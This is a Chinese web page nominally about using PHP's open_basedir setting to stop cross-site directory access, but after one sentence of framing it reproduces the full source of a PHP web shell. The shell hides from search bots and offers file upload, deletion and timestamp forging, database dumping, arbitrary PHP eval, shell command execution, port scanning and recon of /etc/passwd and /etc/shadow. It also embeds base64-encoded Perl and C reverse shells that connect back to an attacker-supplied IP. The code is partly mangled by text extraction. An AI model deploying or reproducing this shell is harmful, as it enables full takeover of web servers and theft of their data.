php open basedir设置防止跨站
通过在网站挂马,进入到PHP的目录,如果PHP打开了scandir方法的话,可以直接通过目录一级一级的像上面进入,此操作会造成很大的风险。
下面给出PHP的木马文件
//ini_set('display_errors',1);
@error_reporting(7);
@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if( strpos( strtolower($_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
header('HTTP/1.0404 Not Found');
exit;
}
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/',dirname(__FILE__)).'/');
define('SELF', $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
define('IS_WIN', DIRECTORY_SEPARATOR =='\\');
define('IS_GPC', get_magic_quotes_gpc());
$dis_func =get_cfg_var('disable_functions');
define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ? 1 : 0 );
if( IS_GPC ) {
$_POST= s_array($_POST);
}
$P = $_POST;
unset($_POST);
/*===================== 程序配置 =====================*/
$pass = 'e10adc3949ba59abbe56e057f20f883e'; //对应的密码是123456
//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
// cookie 前缀
$cookiepre = '';
// cookie 作用域
$cookiedomain = '';
// cookie 作用路径
$cookiepath = '/';
// cookie 有效期
$cookielife = 86400;
/*===================== 配置结束 =====================*/
$charsetdb = array(
'big5' => 'big5',
'cp-866' => 'cp866',
'euc-jp' => 'ujis',
'euc-kr' => 'euckr',
'gbk' => 'gbk',
'iso-8859-1' => 'latin1',
'koi8-r' => 'koi8r',
'koi8-u' => 'koi8u',
'utf-8' => 'utf8',
'windows-1252' => 'latin1',
);
$act = isset($P['act']) ? $P['act'] : '';
$charset = isset($P['charset']) ? $P['charset']: 'gbk';
$doing = isset($P['doing']) ? $P['doing'] :'';
for ($i=1;$i<=4;$i++) {
${'p'.$i}= isset($P['p'.$i]) ? $P['p'.$i] : '';
}
if (isset($charsetdb[$charset])) {
header("content-Type:text/html; charset=".$charset);
}
$timestamp = time();
/* 身份验证 */
if ($act == "Logout") {
scookie('loginpass','', -86400 * 365);
@header('Location:'.SELF);
exit;
}
if($pass) {
if($act == 'login') {
if($pass == encode_pass($P['password'])) {
scookie('loginpass',encode_pass($P['password']));
@header('Location:'.SELF);
exit;
}
}
if(isset($_COOKIE['loginpass'])) {
if($_COOKIE['loginpass'] != $pass) {
loginpage();
}
}else {
loginpage();
}
}
/* 验证结束 */
$errmsg = '';
$uchar = '▲';
$dchar = '▼';
!$act && $act = 'file';
//当前目录/设置工作目录/网站根目录
$home_cwd = getcwd();
if (isset($P['cwd']) && $P['cwd']){
chdir($P['cwd']);
} else {
chdir(SA_ROOT);
}
$cwd = getcwd();
$web_cwd = $_SERVER['DOCUMENT_ROOT'];
foreach (array('web_cwd','cwd','home_cwd')as $k) {
if(IS_WIN) {
$$k= str_replace('\\', '/', $$k);
}
if(substr($$k, -1) != '/') {
$$k= $$k.'/';
}
}
// 查看PHPINFO
if ($act == 'phpinfo') {
if(IS_PHPINFO) {
phpinfo();
exit;
}else {
$errmsg= 'phpinfo() function has disabled';
}
}
if(!function_exists('scandir')) {
functionscandir($cwd) {
$files= array();
$dh= opendir($cwd);
while($file = readdir($dh)) {
$files[]= $file;
}
return$files ? $files : 0;
}
}
if ($act == 'down') {
if(is_file($p1) && is_readable($p1)) {
@ob_end_clean();
$fileinfo= pathinfo($p1);
if(function_exists('mime_content_type')) {
$type= @mime_content_type($p1);
header("Content-Type:".$type);
}else {
header('Content-type:application/x-'.$fileinfo['extension']);
}
header('Content-Disposition:attachment; filename='.$fileinfo['basename']);
header('Content-Length:'.sprintf("%u", @filesize($p1)));
@readfile($p1);
exit;
}else {
$errmsg= 'Can\'t read file';
$act= 'file';
}
}
?>
function checkall(form) {
for(vari=0;i vare = form.elements[i]; if (e.type == 'checkbox') { if(e.name != 'chkall' && e.name != 'saveasfile') e.checked= form.chkall.checked; } } } function $(id) { returndocument.getElementById(id); } function createdir(){ varnewdirname; newdirname= prompt('请输入目录名:', ''); if(!newdirname) return; g(null,null,'createdir',newdirname); } function fileperm(pfile, val){ varnewperm; newperm= prompt('当前 目录/文件:'+pfile+'\n请输入新的权限:', val); if(!newperm) return; g(null,null,'fileperm',pfile,newperm); } function rename(oldname){ varnewfilename; newfilename= prompt('文件名:'+oldname+'\n请输入新的文件名:', ''); if(!newfilename) return; g(null,null,'rename',newfilename,oldname); } function createfile(){ varfilename; filename= prompt('请输入文件的名字:', ''); if(!filename) return; g('editfile',null, null, filename); } function setdb(dbname) { if(!dbname)return; $('dbform').tablename.value=''; $('dbform').doing.value=''; if($('dbform').sql_query) { $('dbform').sql_query.value=''; } $('dbform').submit(); } function setsort(k) { $('dbform').order.value=k; $('dbform').submit(); } function settable(tablename,doing) { if(!tablename)return; if(doing) { $('dbform').doing.value=doing; }else { $('dbform').doing.value=''; } $('dbform').sql_query.value=''; $('dbform').tablename.value=tablename; $('dbform').submit(); } function s(act,cwd,p1,p2,p3,p4,charset) { if(act!= null) $('opform').act.value=act; if(cwd!= null) $('opform').cwd.value=cwd; if(p1!= null) $('opform').p1.value=p1; if(p2!= null) $('opform').p2.value=p2; if(p3!= null) $('opform').p3.value=p3; if(p4!= null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';} if(charset!= null) $('opform').charset.value=charset; } function g(act,cwd,p1,p2,p3,p4,charset) { s(act,cwd,p1,p2,p3,p4,charset); $('opform').submit(); }
formhead(array('name'=>'opform')); makehide('act', $act); makehide('cwd', $cwd); makehide('p1', $p1); makehide('p2', $p2); makehide('p3', $p3); makehide('p4', $p4); makehide('charset', $charset); formfoot(); if(!function_exists('posix_getegid')) { $user= @get_current_user(); $uid= @getmyuid(); $gid= @getmygid(); $group= "?"; } else { $uid= @posix_getpwuid(@posix_geteuid()); $gid= @posix_getgrgid(@posix_getegid()); $uid= $uid['uid']; $user= $uid['name']; $gid= $gid['gid']; $group= $gid['name']; } ?>
makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);')); ?>
|
$errmsg && m($errmsg);
if ($act == 'file') {
//判断当前目录可写情况
$dir_writeable= @is_writable($cwd) ? 'Writable' : 'Non-writable';
if(isset($p1)) {
switch($p1){
case'createdir':
//创建目录
if($p2) {
m('Directorycreated '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
}
break;
case'uploadFile':
//上传文件
m('Fileupload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'],$cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
break;
case'fileperm':
//编辑文件属性
if($p2 && $p3) {
$p3= base_convert($p3, 8, 10);
m('Setfile permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
}
break;
case'rename':
//改名
if($p2 && $p3) {
m($p3.'renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
}
break;
case'clonetime':
//克隆时间
if($p2 && $p3) {
$time= @filemtime($p3);
m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
}
break;
case'settime':
//自定义时间
if($p2 && $p3) {
$time= strtotime($p3);
m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
}
break;
case'delete':
//批量删除文件
if($P['dl']) {
$succ= $fail = 0;
foreach($P['dl'] as $f) {
if(is_dir($cwd.$f)) {
if(@deltree($cwd.$f)) {
$succ++;
}else {
$fail++;
}
}else {
if(@unlink($cwd.$f)) {
$succ++;
}else {
$fail++;
}
}
}
m('Deletedfolder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.',fail '.$fail);
}else {
m('Pleaseselect folder/file(s)');
}
break;
case'paste':
if($_SESSION['do']== 'copy') {
foreach($_SESSION['dl']as $f) {
copy_paste($_SESSION['c'],$f,$cwd);
}
}elseif($_SESSION['do'] == 'move') {
foreach($_SESSION['dl']as $f) {
@rename($_SESSION['c'].$f,$cwd.$f);
}
}
unset($_SESSION['do'],$_SESSION['dl'], $_SESSION['c']);
break;
default:
if($p1== 'copy' || $p1 == 'move') {
if(isset($P['dl']) && count($P['dl'])) {
$_SESSION['do']= $p1;
$_SESSION['dl']= $P['dl'];
$_SESSION['c']= $P['cwd'];
m('Havebeen copied to the session');
}else {
m('Pleaseselect folder/file(s)');
}
}
break;
}
echo"
}
//操作完毕
$free= @disk_free_space($cwd);
!$free&& $free = 0;
$all= @disk_total_space($cwd);
!$all&& $all = 0;
$used= $all-$free;
p(' 文件管理器——当前的磁盘空间 '.sizecount($free).' of'.sizecount($all).' ('.@round(100/($all/$free),2).'%)');
$cwd_links= '';
$path= explode('/', $cwd);
$n=count($path);
for($i=0;$i<$n-1;$i++){
$cwd_links.= ''.$path[$i].'/';
}
?>
document.onclick = shownav;
function shownav(e){
varsrc = e?e.target:event.srcElement;
do{
if(src.id=="jumpto") {
$('inputnav').style.display= "";
$('pathnav').style.display= "none";
return;
}
if(src.id=="inputnav") {
return;
}
src= src.parentNode;
}while(src.parentNode)
$('inputnav').style.display= "none";
$('pathnav').style.display= "";
}
|
if(IS_WIN) {
$comma= '';
p('
foreach(range('A','Z') as $drive ) {
if(is_dir($drive.':/')) {
p($comma.'
$comma= '|';
}
}
p('
}
?>
p('
p(' p(' p(' p('| 程序目录'); p('| p('');
');
$sort= array('filename', 1);
if($p1){
if(preg_match('!s_([A-z_]+)_(\d{1})!',$p1, $match)) {
$sort= array($match[1], (int)$match[2]);
}
}
formhead(array('name'=>'flist'));
makehide('act','file');
makehide('p1','');
makehide('cwd',$cwd);
makehide('charset',$charset);
p('
p('
p('
p('
p('
p('
p('
p('');
//查看所有可写文件和目录
$dirdata=$filedata=array();
if($p4 == 'dir') {
$dirdata= GetWDirList($cwd);
$filedata= array();
}else {
//默认目录列表
$dirs= @scandir($cwd);
if($dirs) {
$dirs= array_diff($dirs, array('.'));
foreach($dirs as $file) {
$filepath=$cwd.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));
$dirdb['chmod']=getChmod($filepath);
$dirdb['perm']=PermsColor($filepath);
$dirdb['owner']=getUser($filepath);
$dirdb['link']=$filepath;
if($file=='..') {
$dirdata['up']=1;
}else {
$dirdata[]=$dirdb;
}
}else {
$filedb['filename']=$file;
//$filedb['size']=@filesize($filepath);
$filedb['size']=sprintf("%u",@filesize($filepath));
$filedb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));
$filedb['chmod']=getChmod($filepath);
$filedb['perm']=PermsColor($filepath);
$filedb['owner']=getUser($filepath);
$filedb['link']=$filepath;
$filedata[]=$filedb;
}
}
unset($dirdb);
unset($filedb);
}
}
$dir_i= '0';
if(isset($dirdata['up'])) {
$thisbg= bg();
p('
p('
p('');
}
unset($dirdata['up']);
usort($dirdata,'cmp');
usort($filedata,'cmp');
foreach($dirdataas $key => $dirdb){
if($p1== 'getsize' && $p2 == $dirdb['filename']) {
$attachsize= dirsize($p2);
$attachsize= is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
}else {
$attachsize= '查看大小';
}
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('');
$dir_i++;
}
p('');
$file_i= '0';
foreach($filedataas $key => $filedb){
$fileurl= '/'.str_replace($web_cwd,'',$filedb['link']);
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('');
$file_i++;
}
p(''.$dir_i.' 目录 / '.$file_i.' 文件 ');
p('');
}// end dir
elseif ($act == 'mysqladmin') {
$order= isset($P['order']) ? $P['order'] : '';
$dbhost= isset($P['dbhost']) ? $P['dbhost'] : '';
$dbuser= isset($P['dbuser']) ? $P['dbuser'] : '';
$dbpass= isset($P['dbpass']) ? $P['dbpass'] : '';
$dbname= isset($P['dbname']) ? $P['dbname'] : '';
$tablename= isset($P['tablename']) ? $P['tablename'] : '';
if($doing == 'dump') {
if(isset($P['bak_table']) && $P['bak_table']) {
$DB= new DB_MySQL;
$DB->charsetdb= $charsetdb;
$DB->charset= $charset;
$DB->connect($dbhost,$dbuser, $dbpass, $dbname);
if($P['saveasfile'] && $P['bak_path']) {
$fp= @fopen($P['bak_path'],'w');
if($fp) {
foreach($P['bak_table']as $k => $v) {
if($v) {
$DB->sqldump($v,$fp);
}
}
fclose($fp);
$fileurl= str_replace(SA_ROOT,'',$P['bak_path']);
m('Databasehas backup to '.$P['bak_path'].'');
}else {
m('Backupfailed');
}
}else {
@ob_end_clean();
$filename= basename($dbname.'.sql');
header('Content-type:application/unknown');
header('Content-Disposition:attachment; filename='.$filename);
foreach($P['bak_table']as $k => $v) {
if($v) {
$DB->sqldump($v);
}
}
exit;
}
$DB->close();
}else {
m('Pleasechoose the table');
}
$doing= '';
}
formhead(array('title'=>'MYSQL管理', 'name'=>'dbform'));
makehide('act','mysqladmin');
makehide('doing',$doing);
makehide('charset',$charset);
makehide('tablename',$tablename);
makehide('order',$order);
p('
');
p('地址:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p('用户:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('密码:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
makeinput(array('value'=>'连接','type'=>'submit','class'=>'bt'));
p('
');
if($dbhost && $dbuser && isset($dbpass)) {
//初始化数据库类
$DB= new DB_MySQL;
$DB->charsetdb= $charsetdb;
$DB->charset= $charset;
$DB->connect($dbhost,$dbuser, $dbpass, $dbname);
//获取数据库信息
p('
$highver= $DB->version() > '4.1' ? 1 : 0;
//获取数据库
$query= $DB->query("SHOW DATABASES");
$dbs= array();
$dbs[]= '-- Select a database --';
while($db= $DB->fetch($query)) {
$dbs[$db['Database']]= $db['Database'];
}
makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));
if($dbname) {
p('
Currentdababase:
if($tablename) {
p('| Current Table: '.$tablename.'[ Structure ]');
}
p('
');
$sql_query= isset($P['sql_query']) ? $P['sql_query'] : '';
if($tablename && !$sql_query) {
$sql_query= "SELECT * FROM $tablename LIMIT 0, 30";
}
if($tablename && $doing == 'structure') {
$sql_query= "SHOW FULL COLUMNS FROM $tablename;\n";
$sql_query.= "SHOW INDEX FROM $tablename;";
}
p('
Run SQLquery/queries on database'.$dbname.':
if($sql_query) {
$querys= @explode(';',$sql_query);
foreach($querysas $num=>$query) {
if($query) {
p("
switch($DB->query_res($query))
{
case0:
p('
'.$DB->halt('Error').'
');
break;
case1:
$result= $DB->query($query);
$tatol= $DB->num_rows($result);
p('
p('
$fieldnum= @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
p('
}
p('');
if(!$tatol) {
p('Norecords ');
}else {
while($mn= $DB->fetch($result)){
$thisbg= bg();
p('
//读取记录用
foreach($mnas $key=>$inside){
p('
}
p('');
unset($b1);
}
}
p('');
break;
case2:
p('
AffectedRows : '.$DB->affected_rows().'
');
break;
}
}
}
}else {
$query= $DB->query("SHOW TABLE STATUS");
$table_num= $table_rows = $data_size = 0;
$tabledb= array();
while($table= $DB->fetch($query)) {
$data_size= $data_size + $table['Data_length'];
$table_rows= $table_rows + $table['Rows'];
$table_num++;
$tabledb[]= $table;
}
$data_size= sizecount($data_size);
unset($table);
if(count($tabledb)) {
if($highver) {
$db_engine= $DB->fetch($DB->query("SHOW VARIABLES LIKE'storage_engine';"));
$db_collation= $DB->fetch($DB->query("SHOW VARIABLES LIKE'collation_database';"));
}
$sort= array('Name', 1);
if($order){
if(preg_match('!s_([A-z_]+)_(\d{1})!',$order, $match)) {
$sort= array($match[1], (int)$match[2]);
}
}
usort($tabledb,'cmp');
p('
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
foreach($tabledb as $key => $table) {
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
}
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
p("
p("");
}else {
p('
}
$DB->free_result($query);
}
}
$DB->close();
}
formfoot();
}//end mysql
elseif ($act == 'backconnect') {
!$p2&& $p2 = $_SERVER['REMOTE_ADDR'];
!$p3&& $p3 = '12345';
$usedb= array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if($p1 == 'start' && $p2 && $p3 && $p4){
if($p4 == 'perl') {
cf('/tmp/angel_bc',$back_connect);
$res= execute(which('perl')." /tmp/angel_bc ".$p2."".$p3." &");
}else {
cf('/tmp/angel_bc.c',$back_connect_c);
$res= execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res= execute("/tmp/angel_bc ".$p2." ".$p3." &");
}
m('Nowscript try connect to '.$p2.':'.$p3.' ...');
}
formhead(array('title'=>'BackConnect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);returnfalse;'));
p('
');
p('YourIP:');
makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
p('YourPort:');
makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
p('Use:');
makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
p('
');
formfoot();
}//end
elseif ($act == 'portscan') {
!$p2&& $p2 = '127.0.0.1';
!$p3&& $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
formhead(array('title'=>'端口扫描','onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);returnfalse;'));
p('
');
p('IP:');
makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
p('Port:');
makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
makeinput(array('value'=>'扫描','type'=>'submit','class'=>'bt'));
p('
');
formfoot();
if($p1 == 'start') {
p('
Result»
');
p('
foreach(explode(',',$p3) as $port) {
$fp= @fsockopen($p2, $port, $errno, $errstr, 1);
if(!$fp) {
p('
} else {
p('
@fclose($fp);
}
}
p('');
}
}
elseif ($act == 'eval') {
$phpcode= trim($p1);
if($phpcode){
if(!preg_match('#<\?#si', $phpcode)) {
$phpcode= "";
}
eval("?".">$phpcode
}
formhead(array('title'=>'EvalPHP代码','onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
maketext(array('title'=>'PHP代码','name'=>'p1', 'value'=>$phpcode));
p('
formfooter();
}//end eval
elseif ($act == 'editfile') {
//编辑文件
if($p1 == 'edit' && $p2 && $p3) {
$fp= @fopen($p2,'w');
m('Savefile '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
@fclose($fp);
}
$contents= '';
if(file_exists($p2)){
$fp=@fopen($p2,'r');
$contents=@fread($fp,filesize($p2));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'创建/编辑文件','onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'文件名:','name'=>'p2','value'=>$p2,'newline'=>1));
maketext(array('title'=>'文件内容:','name'=>'p3','value'=>$contents));
formfooter();
goback();
}//end editfile
elseif ($act == 'newtime') {
$filemtime= @filemtime($p1);
formhead(array('title'=>'Clonefolder/file was last modified time','onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'Alterfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Referencefolder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Setlast modified','onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'Currentfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Modifytime','name'=>'p3','value'=>date("Y-m-d H:i:s",$filemtime),'size'=>120,'newline'=>1));
formfooter();
goback();
}//end newtime
elseif ($act == 'shell') {
formhead(array('title'=>'执行命令', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
p('
');
makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
makeinput(array('class'=>'bt','type'=>'submit','value'=>'执行'));
p('
');
formfoot();
if($p1) {
p('
'.execute($p1).'');
}
}//end shell
elseif ($act == 'phpenv') {
$d=array();
if(function_exists('mysql_get_client_info'))
$d[]= "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$d[]= "MSSQL";
if(function_exists('pg_connect'))
$d[]= "PostgreSQL";
if(function_exists('oci_connect'))
$d[]= "Oracle";
$info= array(
1=> array('服务器 时间',date('Y/m/d h:i:s',$timestamp)),
2=> array('服务器 域名',$_SERVER['SERVER_NAME']),
3=> array('服务器IP',gethostbyname($_SERVER['SERVER_NAME'])),
4=> array('服务器 系统',PHP_OS),
5=> array('服务器 系统编码',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6=> array('服务器 软件',$_SERVER['SERVER_SOFTWARE']),
7=> array('服务器 网站端口',$_SERVER['SERVER_PORT']),
8=> array('PHP 运行方式',strtoupper(php_sapi_name())),
9=> array('文件路径',__FILE__),
10=> array('PHP 版本',PHP_VERSION),
11=> array('PHP信息',(IS_PHPINFO ? '
12=> array('安全模式',getcfg('safe_mode')),
13=> array('管理员',(isset($_SERVER['SERVER_ADMIN']) ?$_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
14=> array('允许url打开',getcfg('allow_url_fopen')),
15=> array('使用dl',getcfg('enable_dl')),
16=> array('显示错误',getcfg('display_errors')),
17=> array('注册全局变量',getcfg('register_globals')),
18=> array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19=> array('内存限制',getcfg('memory_limit')),
20=> array('post大小',getcfg('post_max_size')),
21=> array('上传文件大小',(getcfg('file_uploads') ?getcfg('upload_max_filesize') : 'Not allowed')),
22=> array('执行时间',getcfg('max_execution_time').'second(s)'),
23=> array('禁用功能',($dis_func ? $dis_func : 'No')),
24=> array('所支持的数据库',implode(', ', $d)),
25=> array('Curl支持',function_exists('curl_version') ?'Yes' : 'No'),
26=> array('Open base dir',getcfg('open_basedir')),
27=> array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
28=> array('Safe mode include dir',getcfg('safe_mode_include_dir')),
);
$hp= array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++){
p('
'.$hp[$a].'»
');
p('
if($a==0) {
for($i=1;$i<=9;$i++){
p('
}
}elseif ($a == 1) {
for($i=10;$i<=25;$i++){
p('
}
}
p('');
}
}//end phpenv
elseif ($act == 'secinfo') {
if(!IS_WIN ) {
$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger= array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders= array('wget','fetch','lynx','links','curl','get','lwp-mirror');
secparam('Readable/etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
secparam('Readable/etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
secparam('OSversion', @file_get_contents('/proc/version'));
secparam('Distrname', @file_get_contents('/etc/issue.net'));
$safe_mode= @ini_get('safe_mode');
if(!$GLOBALS['safe_mode']){
$temp=array();
foreach($userful as $item)
if(which($item)){$temp[]=$item;}
secparam('Userful',implode(', ',$temp));
$temp=array();
foreach($danger as $item)
if(which($item)){$temp[]=$item;}
secparam('Danger',implode(', ',$temp));
$temp=array();
foreach($downloaders as $item)
if(which($item)){$temp[]=$item;}
secparam('Downloaders',implode(', ',$temp));
secparam('Hosts',@file_get_contents('/etc/hosts'));
secparam('HDDspace', execute('df -h'));
secparam('Mountoptions', @file_get_contents('/etc/fstab'));
}
}else {
secparam('OSVersion',execute('ver'));
secparam('AccountSettings',execute('net accounts'));
secparam('UserAccounts',execute('net user'));
secparam('IPConfigurate',execute('ipconfig -all'));
}
}//end
else {
m('未定义的行动');
}
?>
debuginfo();
ob_end_flush();
if(isset($DB)) {
echo'. '.$DB->querycount.' queries';
}
?>
.